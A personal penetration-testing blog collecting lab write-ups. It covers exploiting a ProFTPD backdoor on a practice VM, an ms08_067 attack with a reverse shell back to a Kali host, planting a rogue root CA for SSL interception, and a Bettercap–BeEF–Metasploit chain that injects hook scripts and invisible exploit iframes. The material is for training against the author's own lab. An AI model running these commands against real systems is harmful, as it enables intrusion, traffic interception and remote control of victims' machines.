Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things) turned up the following VM, which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, it looks like its hostname is vtcsec (made a note of that…). Aside from that, I see ftp, ssh, and http open. Let’s get some more details with nmap.

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format (I run URXVT, so it’s likely some unicode that won’t translate to ASCII neatly… whatever). I did find two options available; the one that interests me was “Backdoor Command Execution (Metasploit)”. So let’s fire up Metasploit and see what we can do.
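As an added example (not part of the original write-up), here is a small Python script that parses the nmap -sV output from the scan above into structured records and flags the ProFTPD 1.3.3c banner that searchsploit identified. The sample text and the watch-list entry are constructed from what is on this page.

```python
import re

# Constructed sample: the nmap -sV output from the scan above.
NMAP_SV_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
"""

# One port line: "<port>/<proto> <state> <service> [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Watch-list of banners that should raise a finding. Constructed for this
# example; the ProFTPD entry mirrors the searchsploit result in the post.
WATCHLIST = {
    ("ftp", "ProFTPD 1.3.3c"): "release known to carry a backdoor; upgrade or retire",
}


def parse_ports(text):
    """Turn nmap -sV port lines into dicts; header and MAC lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        ports.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service, "version": (version or "").strip(),
        })
    return ports


def flag_services(ports):
    """Return (port, banner, note) for every open service on the watch-list."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        for (service, banner), note in WATCHLIST.items():
            if p["service"] == service and p["version"].startswith(banner):
                findings.append((p["port"], p["version"], note))
    return findings


if __name__ == "__main__":
    for port, banner, note in flag_services(parse_ports(NMAP_SV_OUTPUT)):
        print(f"{port}: {banner} -> {note}")
```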

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c_backdoor! This should be easy enough then.

use exploit/unix/ftp/proftpd_133c_backdoor
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there are other ways in though, so next time I’ll try some other routes. That’s all for now.


If you want to see some other vulnerable VM write-ups I’ve done check out the vulnerable VM category.

Installing Kali on a Raspberry Pi Zero W

Overview

I love my little Pi Zero W’s, and I love Kali. So why not combine the two? Here’s a post about installing Kali Linux on a Raspberry Pi Zero W. I’ve done this before, and it’s reasonably well documented elsewhere, but I hate googling for all the pieces each time I do this, so I figured I’d make a blog post documenting it all for the future so I’ve got all the links in one place.

FWIW, I do most of my daily driving on Windows because that’s what I use at work, hence this will be written for a Windows PC. It’s also high level because honestly, this is easy, and if your goal is to install Kali on an rpi0w, you probably don’t need much hand holding. 😉

Materials Needed
Process
  1. Format the card with the flasher utility
  2. Write the ISO to the card with Etcher.
  3. Boot up the pi.
References

Messing Around in Metasploit

Over lunch break I’ve just been reading up on some general things you can do in Metasploit. I’ve been playing with some misc. modules such as:

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/tcp
  • auxiliary/scanner/smb/smb_version

I also learned about the IP ID idle scan technique. Very clever indeed. There’s a module for that too: auxiliary/scanner/ip/ipidseq

References:
https://www.offensive-security.com/metasploit-unleashed/port-scanning/
https://nmap.org/book/idlescan.html


Injecting Certificates?

Tonight I’m messing around with post/windows/manage/inject_ca, specifically trying to get it to work. Seems like a handy little item to have for SSL based MITM attacks: create a root CA, use an exploit to add it to the root store of a target, then lay low and wait for web logins. Doubly useful for those HSTS secured sites…

I didn’t realize that certificates are just stored as binary blobs in the registry. Neat.

Also, XP SP3 just straight up doesn’t understand SHA512. At all. I had to apply a hotfix to get it up and running.

References:
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/
https://support.microsoft.com/en-us/help/968730/windows-server-2003-and-windows-xp-clients-cannot-obtain-certificates

Mastering the Obvious

Today I learned the difference between true Meterpreter and the plain reverse shell. Previously I had used Meterpreter to get a shell; I didn’t know you could just have it give you one. Though I’ve found it somewhat inconvenient not having the full Meterpreter suite available, so my preference is definitely Meterpreter over the straight reverse shell.

windows/meterpreter/reverse_tcp == Standard Meterpreter
generic/shell_reverse_tcp == command prompt. Yes, duh, a shell.

Also found this nifty cheat sheet. (PDF warning)

Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines. While this doesn’t really represent any kind of real world situation, it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air 20.0.0.204
  • Adobe Flash 18.0.0.194
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer 15.0.5.109
  • Shockwave 11.0.3.471

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom. The first run indicated the port wasn’t open, which made sense because I never opened that port on the target. So I created a file share to “prime the pump”. Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait for a while. It will finish eventually.

MetaSploit, Bettercap, and BeEf

MetaSploit, Bettercap, and BeEf work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is 192.168.1.1, the Kali host is 192.168.1.50, and the target is 192.168.1.100.

Start MetaSploit using msgrpc
root@KALI:~# msfconsole
msf > load msgrpc ServerHost=192.168.1.50 Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook url from the resulting command output.
(It will look something like this: http://192.168.1.100:3000/hook.js)

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T 192.168.1.1 -T 192.168.1.100 --proxy-module injectjs --js-url http://192.168.1.100:3000/hook.js

Open up the BeEF Admin URL by browsing to http://192.168.1.50:3000/ui/panel

Assuming a client is hooked, investigate the client to determine likely Metasploit options and get the Metasploit exploit ready. Use the “Create invisible iframe” command to spawn an invisible iframe pointed at the URL of the Metasploit exploit.

That’s it.

References:
https://www.metasploit.com/
https://www.bettercap.org/
http://beefproject.com/
https://sathisharthars.com/